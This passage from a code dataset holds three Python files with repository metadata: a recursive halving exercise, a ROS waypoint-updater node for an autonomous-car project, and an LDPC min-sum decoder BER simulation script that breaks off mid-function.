88cd0efdbf7dde7dc57026649130a9c332e23c91
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
"""
Given two integers `a` and `b`, return how many times `a` can be halved while
still being greater than `b`.
### Examples
halve_count(4666, 544) ➞ 3
# (4666 -> 2333 -> 1166.5 -> 583.25)
halve_count(624, 8) ➞ 6
# (624 -> 312 -> 156 -> 78 -> 39 -> 19.5 -> 9.75)
halve_count(1000, 3) ➞ 8
# (1000 -> 500 -> 250 -> 125 -> 62.5 -> 31.25 -> 15.625 -> 7.8125 -> 3.90625)
### Notes
* Integer `a` will always be (at least) greater than the _twice_ of `b`.
* You are expected to solve this challenge via a **recursive** approach.
"""
def halve_count(a, b):
if a <= b:
return -1
return 1 + halve_count(a/2,b)
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
50257f98a45f5ab5ab95435e92d5da92c0a4a5b6
|
1a8c865bc300146078399a484e3537db5c909707
|
/ros/src/waypoint_updater/waypoint_updater.py
|
f58463599e36297bbb91a946aee415d4f98c0067
|
[
"MIT"
] |
permissive
|
MikeBMW/CarND-Capstone-debug
|
54530fe27636d8fe5f3a66ea5d937a13a48e4e25
|
9312eb38d24fc9c377ace4a56fbb13938f9598b3
|
refs/heads/master
| 2020-03-10T08:22:50.938161
| 2018-04-12T16:54:21
| 2018-04-12T16:54:21
| 129,283,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,886
|
py
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import PoseStamped
from styx_msgs.msg import Lane, Waypoint
from std_msgs.msg import Int32
import math
import numpy as np
from scipy.spatial import KDTree
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
'''
LOOKAHEAD_WPS = 200 # Number of waypoints we will publish. You can change this number
MAX_DECEL = .5
class WaypointUpdater(object):
def __init__(self):
rospy.init_node('waypoint_updater')
# reserve waypoint
self.base_lane = None
# get from traffic_waypoint
self.stopline_wp_idx = -1
# contains a list of (x,y) tuples for all waypoints
self.waypoints_2d = None
# KD tree of the x,y waypoints to increase lookup time
self.waypoint_tree = None
# stores the raw pose message
self.pose_msg = None
rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb)
self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)
self.publisher_loop(50)
def publisher_loop(self, frequency):
"""
Task: This method is called from the constructor and is responsible for calling the
publishers and their helpers repeatedly.
arguments:
-frequency: int, the frequency with which to call the publishers
returns: Nothing
"""
rate = rospy.Rate(frequency)
while not rospy.is_shutdown():
if self.pose_msg and self.base_lane:
self.publish_waypoints()
rate.sleep()
def pose_cb(self, msg):
"""
Task: Processes the messages which contain the current
position of the vehicle in map coordinates
arguments:
- msg: message type geometry_msgs/PoseStamped
returns: Nothing
ROS integration
===
Type: Callback
Topic: /current_pose
msg_type: geometry_msgs/PoseStamped
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Pose pose
geometry_msgs/Point position
float64 x
float64 y
float64 z
geometry_msgs/Quaternion orientation
float64 x
float64 y
float64 z
float64 w
"""
self.pose_msg = msg
def waypoints_cb(self, waypoint_msg):
"""
Task: Processes the waypoints message which contains all of the track's waypoints in map coordinates.
Needs only to run once, because the waypoints are sent only once at the beginning.
arguments:
- waypoints: message type styx_msgs/Lane
returns: Nothing
ROS integration:
===
Type: Callback
Topic: /base_waypoints
msg_type: styx_msgs/Lane
std_msgs/Header header
uint32 seq
time stamp
string frame_id
styx_msgs/Waypoint[] waypoints
geometry_msgs/PoseStamped pose
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Pose pose
geometry_msgs/Point position
float64 x
float64 y
float64 z
geometry_msgs/Quaternion orientation
float64 x
float64 y
float64 z
float64 w
geometry_msgs/TwistStamped twist
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Twist twist
geometry_msgs/Vector3 linear
float64 x
float64 y
float64 z
geometry_msgs/Vector3 angular
float64 x
float64 y
float64 z
"""
self.base_lane = waypoint_msg
if not self.waypoints_2d:
self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoint_msg.waypoints]
self.waypoint_tree = KDTree(self.waypoints_2d)
def publish_waypoints(self):
"""
Task: Invokes the waypoint publisher and publishes the nearest waypoints to the
/final_waypoints topic.
arguments:
- closest_idx: int, the idx of the nearest waypoints in front of the car.
ROS integration:
===
Type: Publisher
Topic: /final_waypoints
msg_type: styx_msgs/Lane
std_msgs/Header header
uint32 seq
time stamp
string frame_id
styx_msgs/Waypoint[] waypoints
geometry_msgs/PoseStamped pose
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Pose pose
geometry_msgs/Point position
float64 x
float64 y
float64 z
geometry_msgs/Quaternion orientation
float64 x
float64 y
float64 z
float64 w
geometry_msgs/TwistStamped twist
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Twist twist
geometry_msgs/Vector3 linear
float64 x
float64 y
float64 z
geometry_msgs/Vector3 angular
float64 x
float64 y
float64 z
"""
final_lane = self.generate_lane()
self.final_waypoints_pub.publish(final_lane)
def generate_lane(self):
lane = Lane()
closest_idx = self.get_nearest_waypoint_idx()
farthest_idx = closest_idx + LOOKAHEAD_WPS
base_waypoints = self.base_lane.waypoints[closest_idx:farthest_idx]
# don't care about it, leave it alone
if self.stopline_wp_idx == -1 or (self.stopline_wp_idx >= farthest_idx):
lane.waypoints = base_waypoints
# brake action
else:
lane.waypoints = self.decelerate_waypoints(base_waypoints, closest_idx)
return lane
def decelerate_waypoints(self, waypoints, closest_idx):
# don't modify base waypoint directly, so use temp[]
temp = []
for i, wp in enumerate(waypoints):
p = Waypoint()
p.pose = wp.pose
# back off two waypoints so the front of the car, not its center, stops at the line
stop_idx = max(self.stopline_wp_idx - closest_idx - 2, 0)
# figure out how far this waypoint is from the stop point
dist = self.distance(waypoints, i, stop_idx)
# deceleration profile while braking: from v^2 = 2*a*d, the largest speed that still allows
# stopping within dist at MAX_DECEL; the larger the distance, the gentler the braking
vel = math.sqrt(2 * MAX_DECEL * dist)
if vel < 1.:
vel = 0.
p.twist.twist.linear.x = min(vel, wp.twist.twist.linear.x)
temp.append(p)
return temp
def get_nearest_waypoint_idx(self):
"""
Task: Finds the nearest waypoint according to the car's current position
and returns the index of that waypoint
returns: int, index of nearest waypoint in self.waypoints_2d
"""
x = self.pose_msg.pose.position.x
y = self.pose_msg.pose.position.y
# lookup the KDtree to find the nearest point and return its index
closest_idx = self.waypoint_tree.query([x, y], 1)[1]
closest_coord = np.array(self.waypoints_2d[closest_idx])
prev_coord = np.array(self.waypoints_2d[closest_idx - 1])
current_pos = np.array([x, y])
wp_vec = closest_coord - prev_coord
car_vec = closest_coord - current_pos
# calculate dot product between the two vectors
# to determine if closest point is ahead of car
# -> same heading if dot product is > 0
dot_product = np.dot(wp_vec, car_vec)
# if the closest point is not ahead of the vehicle, choose the next point
if dot_product < 0:
closest_idx = (closest_idx + 1) % len(self.waypoints_2d)
return closest_idx
def traffic_cb(self, msg):
self.stopline_wp_idx = msg.data
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity(self, waypoint):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity(self, waypoints, waypoint, velocity):
waypoints[waypoint].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
if __name__ == '__main__':
try:
WaypointUpdater()
except rospy.ROSInterruptException:
rospy.logerr('Could not start waypoint updater node.')
|
[
"niyingxiang@126.com"
] |
niyingxiang@126.com
|
f4416aaaa435141bea8864fab5f4166587c55d93
|
97f741400c3fbc0cd184c78ed34b172c0f61110d
|
/Function/Simulation.py
|
59ece9a9eb6fc58e5d43c4f60a970c5239c7fad1
|
[] |
no_license
|
Leo-Chu/NOLD
|
61f5b80cd769071e51273866d50f87ac1d7a505b
|
bafc65a709d024d5ff14460f36f77d2a21632c12
|
refs/heads/master
| 2021-07-23T14:37:26.257245
| 2021-04-14T14:54:38
| 2021-04-14T14:54:38
| 247,094,657
| 10
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,258
|
py
|
import numpy as np
import datetime
import tensorflow as tf
import Function.Modulation as Modulation
import Function.Transmission as Transmission
import Function.DataIO as DataIO
import Function.BP_MS_Decoder as BP_MS_Decoder
def LDPC_BP_MS_AWGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size):
## load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
H_matrix = code.H_matrix
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
alpha = dec_config.alpha
beta = dec_config.beta
function = 'LDPC_BP_MS_AWGN_test'
# build BP decoding network
bp_decoder = BP_MS_Decoder.BP_NetDecoder(H_matrix, batch_size, alpha, beta)
# init graph
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
## initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
# encode and transmission
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.decode(LLR.astype(np.float32), BP_iter_num[0])
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_MS_ACGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size):
## load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
H_matrix = code.H_matrix
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
alpha = dec_config.alpha
beta = dec_config.beta
function = 'LDPC_BP_MS_ACGN_test'
# build BP decoding network
bp_decoder = BP_MS_Decoder.BP_NetDecoder(H_matrix, batch_size, alpha, beta)
# init graph
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
## initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
# encode and transmission
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.decode(LLR.astype(np.float32), BP_iter_num[0])
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_MS_RLN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size):
## load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
H_matrix = code.H_matrix
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
alpha = dec_config.alpha
beta = dec_config.beta
function = 'LDPC_BP_MS_RLN_test'
# build BP decoding network
bp_decoder = BP_MS_Decoder.BP_NetDecoder(H_matrix, batch_size, alpha, beta)
# init graph
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
## initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
r_factor_file = format('%s_%.1f.dat' % (dec_config.decoding_r_file, SNR))
factorio_decode = DataIO.FactorDataIO(r_factor_file, dec_config)
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
# encode and transmission
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
r_factor = factorio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - np.multiply(s_mod, r_factor)
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.decode(LLR.astype(np.float32), BP_iter_num[0])
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_QMS_AWGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size, bp_decoder):
# load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
para_file = dec_config.para_file
function = 'LDPC_BP_QMS_AWGN_test'
# init graph
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
# initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
para_data_file = format('%sPARA(%d_%d)_SNR%.1f_Iter%d.txt' % (para_file, N, K, SNR, BP_iter_num))
para = np.loadtxt(para_data_file, np.float32)
alpha = para[0,:]
beta = para[1,:]
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
# encode and transmission
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.quantized_decode(LLR.astype(np.float32), BP_iter_num[0], alpha, beta)
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
#ber
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_QMS_ACGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size, bp_decoder):
# load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
para_file = dec_config.para_file
function = 'LDPC_BP_QMS_ACGN_test'
# init graph
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
# initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
para_data_file = format('%s/PARA(%d_%d)_SNR%.1f_Iter%d.txt' % (para_file, N, K, SNR, BP_iter_num))
para = np.loadtxt(para_data_file, np.float32)
alpha = para[0,:]
beta = para[1,:]
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
# encode and transmission
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.quantized_decode(LLR.astype(np.float32), BP_iter_num[0], alpha, beta)
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
#ber
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_QMS_RLN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size, bp_decoder):
# load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
para_file = dec_config.para_file
function = 'LDPC_BP_QMS_RLN_test'
# init graph
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
# initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
para_data_file = format('%s/PARA(%d_%d)_SNR%.1f_Iter%d.txt' % (para_file, N, K, SNR, BP_iter_num))
para = np.loadtxt(para_data_file, np.float32)
alpha = para[0,:]
beta = para[1,:]
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
r_factor_file = format('%s_%.1f.dat' % (dec_config.decoding_r_file, SNR))
factorio_decode = DataIO.FactorDataIO(r_factor_file, dec_config)
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
# encode and transmission
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
r_factor = factorio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - np.multiply(s_mod, r_factor)
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.quantized_decode(LLR.astype(np.float32), BP_iter_num[0], alpha, beta)
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
#ber
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
# Generate LDPC information data
def softsign(x_in):
x_temp = x_in/(np.abs(x_in) + 0.0001)
y_out = np.divide(1-x_temp, 2)
return y_out
def sigmoid(x_in):
y_out = 1/(1+np.exp(-x_in))
return y_out
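# Note on the two helpers above (illustrative, inferred from the code itself):
#   softsign(x) computes (1 - x/(|x| + 1e-4)) / 2, i.e. roughly (1 - sign(x)) / 2, so a positive
#   input maps to ~0 and a negative input to ~1 (a soft hard-decision from an LLR-like value to a
#   bit estimate).
#   sigmoid(x) is the standard logistic function 1 / (1 + exp(-x)).
# e.g. softsign(np.array([3.2, -3.2])) is approximately [0., 1.], and sigmoid(0.) == 0.5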
def Generate_AWGN_Training_Data(code, channel, train_config, generate_data_for):
#initialized
SNR_set = train_config.SNR_set
if generate_data_for == 'Training':
total_batches = int(train_config.training_sample_num // train_config.training_minibatch_size)
batch_size = train_config.training_minibatch_size
elif generate_data_for == 'Test':
total_batches = int(train_config.test_sample_num // train_config.test_minibatch_size)
batch_size = train_config.test_minibatch_size
else:
print('Invalid objective of data generation!')
exit(0)
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
if generate_data_for == 'Training':
fout_feature = open(format('%s_%.1f.dat' % (train_config.training_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.training_label_file, SNR)), 'wb')
elif generate_data_for == 'Test':
fout_feature = open(format('%s_%.1f.dat' % (train_config.test_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.test_label_file, SNR)), 'wb')
for ik in range(0, total_batches):
x_bits, u_coded_bits, s_mod, ch_noise, y_receive = Transmission.AWGN_transmission(SNR, batch_size, train_config, code, channel)
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_feature) # write features to file
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_label)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_ACGN_Training_Data(code, channel, train_config, generate_data_for):
#initialized
SNR_set = train_config.SNR_set
if generate_data_for == 'Training':
total_batches = int(train_config.training_sample_num // train_config.training_minibatch_size)
batch_size = train_config.training_minibatch_size
elif generate_data_for == 'Test':
total_batches = int(train_config.test_sample_num // train_config.test_minibatch_size)
batch_size = train_config.test_minibatch_size
else:
print('Invalid objective of data generation!')
exit(0)
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
if generate_data_for == 'Training':
fout_feature = open(format('%s_%.1f.dat' % (train_config.training_feature_file, SNR)), 'wb')
